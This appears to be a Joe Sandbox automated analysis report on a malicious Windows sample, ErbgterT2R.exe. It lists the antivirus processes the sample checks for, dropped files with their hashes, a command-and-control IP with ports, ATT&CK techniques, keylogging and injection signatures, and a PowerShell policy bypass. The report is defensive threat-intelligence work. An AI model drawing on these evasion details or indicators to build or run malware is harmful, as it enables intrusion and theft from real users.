                      Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Update.exe Binary or memory string: acs.exe
                      Source: Update.exe Binary or memory string: vsserv.exe
                      Source: Update.exe Binary or memory string: kxetray.exe
                      Source: Update.exe Binary or memory string: avcenter.exe
                      Source: Update.exe Binary or memory string: KSafeTray.exe
                      Source: Update.exe Binary or memory string: cfp.exe
                      Source: Update.exe Binary or memory string: avp.exe
                      Source: Update.exe Binary or memory string: 360Safe.exe
                      Source: Update.exe Binary or memory string: rtvscan.exe
                      Source: Update.exe Binary or memory string: 360tray.exe
                      Source: Update.exe Binary or memory string: ashDisp.exe
                      Source: Update.exe Binary or memory string: TMBMSRV.exe
                      Source: Update.exe Binary or memory string: 360Tray.exe
                      Source: Update.exe Binary or memory string: avgwdsvc.exe
                      Source: Update.exe Binary or memory string: AYAgent.aye
                      Source: Update.exe Binary or memory string: RavMonD.exe
                      Source: Update.exe Binary or memory string: QUHLPSVC.EXE
                      Source: Update.exe Binary or memory string: Mcshield.exe
                      Source: Update.exe Binary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      Source: Yara match, File source: Process Memory Space: Update.exe PID: 7652, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match, File source: Process Memory Space: Update.exe PID: 7652, type: MEMORYSTR
                      MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). The matrix grid did not survive extraction; the techniques that carried a hit count in the rendered matrix were: Scripting, Replication Through Removable Media, Windows Management Instrumentation, DLL Side-Loading, Disable or Modify Tools, Input Capture, System Time Discovery, Archive Collected Data, Ingress Tool Transfer, Data Encrypted for Impact, Native API, Access Token Manipulation, Deobfuscate/Decode Files or Information, Peripheral Device Discovery, Screen Capture, Encrypted Channel, System Shutdown/Reboot, PowerShell, Process Injection, Obfuscated Files or Information, File and Directory Discovery, Non-Standard Port, System Information Discovery, Clipboard Data, Application Layer Protocol, Masquerading, Security Software Discovery, Modify Registry, Virtualization/Sandbox Evasion, Process Discovery, Application Window Discovery, Indicator Removal.
                      Behavior Graph (ID: 1584889, Sample: ErbgterT2R.exe, Startdate: 06/01/2025, Architecture: WINDOWS, Score: 100). The rendered graph did not survive extraction; its recoverable content:

                      Root signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for dropped file; 8 other signatures

                      ErbgterT2R.exe (started)
                        dropped: C:\Users\Public\Bilite\Axialis\Update.exe (PE32), C:\Users\Public\Bilite\Axialis\Update.dll (PE32), C:\Users\Public\Bilite\360inst_install.exe (PE32)
                        -> cmd.exe (started); signature: Bypasses PowerShell execution policy
                             -> Update.exe (started)
                                  network: 134.122.155.39, ports 15091, 18852, 49900 (BCPL-SGBGPNETGlobalASNSG, United States)
                                  dropped: C:\Users\user\AppData\Local\Temp\backup.exe (PE32), C:\Users\user\AppData\Local\Temp\backup.dll (PE32), C:\Users\user\AppData\Local\updated.ps1 (ASCII)
                                  signatures: Contains functionality to inject threads in other processes; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes
                                  -> cmd.exe (started) -> powershell.exe, conhost.exe
                                  -> cmd.exe (started) -> powershell.exe, conhost.exe; signature on this powershell.exe: Loading BitLocker PowerShell Module
                                  -> cmd.exe (started) -> conhost.exe, tasklist.exe, timeout.exe, 10 other processes
                             -> conhost.exe (started)

                      Source | Detection | Scanner | Label | Link
                      ErbgterT2R.exe | 37% | ReversingLabs | Win32.Ransomware.Generic
                      Source | Detection | Scanner | Label | Link
                      C:\Users\Public\Bilite\360inst_install.exe | 17% | ReversingLabs
                      C:\Users\Public\Bilite\Axialis\Update.dll | 48% | ReversingLabs | Win32.Trojan.Generic
                      C:\Users\Public\Bilite\Axialis\Update.exe | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\backup.dll | 48% | ReversingLabs | Win32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\backup.exe | 0% | ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      http://sfdw.360safe.com/setup.exe.exe | 0% | Avira URL Cloud | safe
                      http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA | 0% | Avira URL Cloud | safe
                      http://pinst.360.cn/360safe/h_inst.cab | 0% | Avira URL Cloud | safe
                      http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab | 0% | Avira URL Cloud | safe
                      http://pinst.360.cn/360se/wssj_setup.cab | 0% | Avira URL Cloud | safe
                      http://sfdw.360safe.com/safesetup_2000.exe360 | 0% | Avira URL Cloud | safe
                      http://pinst.360.cn/zhuomian/desktopsafe.cab | 0% | Avira URL Cloud | safe
                      http://sfdw.360safe.com/setupbeta.exe4(u7b4N | 0% | Avira URL Cloud | safe
                      http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab | 0% | Avira URL Cloud | safe
                      http://pinst.360.cn/360haohua/safe_chaoqiang.cab? | 0% | Avira URL Cloud | safe
                      https://bbs.360.cn/thread-16079507-1-1.htmlD | 0% | Avira URL Cloud | safe
                      http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh | 0% | Avira URL Cloud | safe
                      134.122.155.39:15092 | 0% | Avira URL Cloud | safe
                      134.122.155.39:15091 | 0% | Avira URL Cloud | safe
                      No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      134.122.155.39:15092 | true | Avira URL Cloud: safe | unknown
                      134.122.155.39:15091 | true | Avira URL Cloud: safe | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab | 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://nuget.org/NuGet.exe | powershell.exe, 00000012.00000002.2634350577.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp | 360inst_install.exe.0.dr | false | | high
                      https://sectigo.com/CPS0 | ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr | false | | high
                      http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe | 360inst_install.exe.0.dr | false | | high
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr | false | | high
                      http://ocsp.sectigo.com0 | ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr | false | | high
                      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://pinst.360.cn/zhuomian/desktopsafe.cab | 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000005144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://sfdw.360safe.com/setup.exe.exe | ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://hao.360.com | 360inst_install.exe.0.dr | false | | high
                      https://contoso.com/License | powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://contoso.com/Icon | powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr | false | | high
                      http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab | 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr | false | | high
                      https://github.com/Pester/Pester | powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://pinst.360.cn/360se/wssj_setup.cab | 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA | ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://down.360safe.com/setup.exePathSOFTWARE | 360inst_install.exe.0.dr | false | | high
                      https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s | 360inst_install.exe.0.dr | false | | high
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr | false | | high
                      http://pinst.360.cn/360haohua/safe_chaoqiang.cab? | ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr | false | | high
                      http://pinst.360.cn/360safe/h_inst.cab | ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://sfdw.360safe.com/setupbeta.exe4(u7b4N | ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      https://aka.ms/pscore6lB | powershell.exe, 00000012.00000002.2632273712.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004981000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeh | 360inst_install.exe.0.dr | false | | high
                      http://sfdw.360safe.com/safesetup_2000.exe360 | 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      https://bbs.360.cn/thread-16079507-1-1.htmlD | 360inst_install.exe.0.dr | false | Avira URL Cloud: safe | unknown
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr | false | | high
                      http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000005144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmp | false |
                                                                      high
                                                                      https://contoso.com/powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000012.00000002.2634350577.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://360.cn360inst_install.exe.0.drfalse
                                                                            high
                                                                            http://www.360.cn/xukexieyi.html#360ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drfalse
                                                                              high
                                                                              http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh360inst_install.exe.0.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:360inst_install.exe.0.drfalse
                                                                                high
                                                                                http://123.com/360inst_install.exe.0.drfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000012.00000002.2632273712.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
IP:134.122.155.39
Domain:unknown
Country:United States
ASN:64050
ASN Name:BCPL-SGBGPNETGlobalASNSG
Malicious:true
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1584889
                                                                                    Start date and time:2025-01-06 17:46:36 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 51s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Run name:Run with higher sleep bypass
Number of new started processes analysed:29
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:ErbgterT2R.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:14DFEC5B51C4D87EACAB495AD216EB7C.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@43/29@0/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 50%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 98%
                                                                                    • Number of executed functions: 160
                                                                                    • Number of non-executed functions: 231
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7196 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7284 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • VT rate limit hit for: ErbgterT2R.exe
                                                                                    No simulations
                                                                                    No context
                                                                                    No context
Match:BCPL-SGBGPNETGlobalASNSG
• Order Inquiry.exe, Detection: malicious, Threat Name: FormBook, Context: 134.122.135.48
• Uulw5M1DfU.exe, Detection: malicious, Threat Name: GhostRat, Context: 137.220.229.61
• HGwpjJUqhW.exe, Detection: malicious, Threat Name: GhostRat, Context: 118.107.44.219
• vYeaC4s9zP.exe, Detection: malicious, Threat Name: GhostRat, Context: 27.124.4.60
• Payment Receipt.exe, Detection: malicious, Threat Name: FormBook, Context: 134.122.133.80
• BrSgiTp1iH.exe, Detection: malicious, Threat Name: GhostRat, Context: 134.122.135.95
• http://smbc.usobd.com, Detection: malicious, Threat Name: Unknown, Context: 134.122.128.92
• zhuzhu.exe, Detection: malicious, Threat Name: GhostRat, XRed, Context: 118.107.44.219
• 017069451a4dbc523a1165a2f1bd361a762bb40856778.exe, Detection: malicious, Threat Name: Unknown, Context: 27.124.34.140
• Lets-x64.exe, Detection: malicious, Threat Name: Nitol, Zegost, Context: 202.79.169.178
                                                                                    No context
Match:C:\Users\Public\Bilite\360inst_install.exe
• zhuzhu.exe, Detection: malicious, Threat Name: GhostRat, XRed
• QQyisSetups64.exe, Detection: malicious, Threat Name: GhostRat
• wyySetups64.exe, Detection: malicious, Threat Name: GhostRat
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4118496
                                                                                          Entropy (8bit):7.743814085153487
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                          MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                          SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                          SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                          SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: zhuzhu.exe, Detection: malicious, Browse
                                                                                          • Filename: QQyisSetups64.exe, Detection: malicious, Browse
                                                                                          • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:openssl enc'd data with salted password, base64 encoded
                                                                                          Category:dropped
                                                                                          Size (bytes):56
                                                                                          Entropy (8bit):5.17325179698034
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:iqknyJzrlKTDbzWkxckiSYuwRY:iln4rYTKX9/+
                                                                                          MD5:422CD802223A0F760D7022721045A8B2
                                                                                          SHA1:5EE147059F4073C6B0F2D97CDAD589C365A10A09
                                                                                          SHA-256:8CDE4BB9ACBD3F479A512CF684113154E93207BC26D854BC0C0F783DDCA02D8A
                                                                                          SHA-512:AD4660E42CB80872F9E73CB21485BBD12DBF54FB09F46206F52F4A64C272B7A2760BC266E5E48151C485A570A5C614FBE23B00433BBC1975EB7FAF32BA45B3B0
                                                                                          Malicious:false
                                                                                          Preview:U2FsdGVkX1+8QmjlVo0alN7lDvfi26gFV1w3WRquYG9AG7aTsLBVUA==
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):340760
                                                                                          Entropy (8bit):6.543041508104496
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:H66LUtNhlhaEDW8zn0iuAhzRgd5KrS8a1GJAlExz30/hUaCcM:H66LUtNrIAzCKzRgDKrSeGUalM
                                                                                          MD5:AC123A633FFD650E1C52DDEA5877D613
                                                                                          SHA1:D42AE3682768449EFFBAB0A2A80E074B31AC31EE
                                                                                          SHA-256:9FD0498B154F81BB9D25AF45CD6B73D01AE2570ADE3E273BCEFCC54FED4D4ECC
                                                                                          SHA-512:190BD111586DE3D276500116EF021CD19DBC1BC64124183041D258833D61329770E2FDFB83EF923FF28BE6C62A95A7A5B28A0B33564588DDED0D77B09F1BAB4E
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 48%
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....mg...........!.........L......Y........................................p............@..........................t..O....t..........p6...............)...@...&...r.......................4.......................w...............................text............................... ..`.rdata..............................@..@.data....!..........................@....00cfg..............................@..@.tls................................@....rsrc...p6.......8..................@..@.reloc...&...@...(..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):395368
                                                                                          Entropy (8bit):5.090673225697451
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
                                                                                          MD5:FB325C945A08D06FE91681179BDCCC66
                                                                                          SHA1:F5D91B7D75D34E156066AB4099E0FD0DF9227B32
                                                                                          SHA-256:0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                                                                                          SHA-512:2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):68873026
                                                                                          Entropy (8bit):7.9999953924006855
                                                                                          Encrypted:true
                                                                                          SSDEEP:1572864:nfqHL70Cjtyh6S0eSlQwvyzXek+NMsUuXWj5XL7tG:nfcjr9+XuNMkw1G
                                                                                          MD5:D6853731E319DC6237C59AD48E14CF89
                                                                                          SHA1:0FDB5B7B5B3314DDC3823E0C1D3C6D675EE5AC61
                                                                                          SHA-256:457C70B59C8F0667870CEE730AB8DCCD592BEC06E3864E7FB715BFD51987F87B
                                                                                          SHA-512:1FA3591D91B7A287EC667AEC8EA844643E8E4D5D9B8B55884E6C52AD26366B347F607EFAA2E18FB97C23FEEBAF7724D6443B593F3AAA0EEED38469A7FDB15216
                                                                                          Malicious:false
                                                                                          Preview:..>..9..x...@..[(.....r......!2q......4..@[..x.&2.f.C..........k..._..^rS.c...r}.<r&..I?..}zz.y.....=..=...pd.W.x..woB.6I.8%h..l..,.d........3.C.P.Ls.{...3..e..1.._..@.+..iRQ...C.'......0.U.eOf....p...~.T..:A..g/.......k....Ty..,..[..?.fi......B.~(..L./iV.../G/...C..#..hQ.!...N....vbh...`.h{......9....V.O..%...V...."....J$7k.Z.J.&Os1...?B.&GU.'.^c.X..}....lF.z.|zr.G....H...a..$N.. ..."........&c.\..2...\.N..X.|K.oY..u...I%.B.f"..wJ..#.7....(..|...r....pB...\.....].3.Y..3..==..L....l.@.6..G..8A"..../.....g...w...q9;..)]..|..h.../..$..5....io.....b40Q1;.......M.L.S.$I..]..M.l.|+.../>.*.j..M'.7u\..zYzn........n{..W.........E....M4.u...6...?5.k.'3.s./E...~V...J;....O...s...)w.\.B.....^.H.O..B.b......T.g..\..F6.....3.tT.B...f-..N..h-...l..W:..b..@[.cX#uF:..n......J%.M...V.Z....?...,....@.f..BIG<...<.N#.!u....{h|...B.......h.cD...;>..c..}...N.B....'iU.d&....x.36.W%I.....`w.e.Q'gz......+.Gn..!U+..m".K. X]9...N0<....c.=.2..../z)m)C/|.4M1...(...
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1360
                                                                                          Entropy (8bit):5.408860214304474
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:3LWSKco4KmZjKMs4RP7mC6moUebIKo+mZ9tXt/NK3R88bJ02raW3b1:7WSU4xc4RTmaoUeW+mZ9tlNWR832Oab1
                                                                                          MD5:2CA946F1B91B258AC9EFD0CB704FA345
                                                                                          SHA1:5CABCEB9B1E9B23E046E5A822FD7F05697F51440
                                                                                          SHA-256:17CB7C204E364EC75FA674FF18D618C3CC9BFD7F8175A394C092CD1F52B190D6
                                                                                          SHA-512:51D2917078B792EF20AAB794128443E35813AFE13A7A2891021890132BA5F7E46664FEC36804439E78340009C3B9D7203299BCCEDCE15D24B606F3C367B54C67
                                                                                          Malicious:false
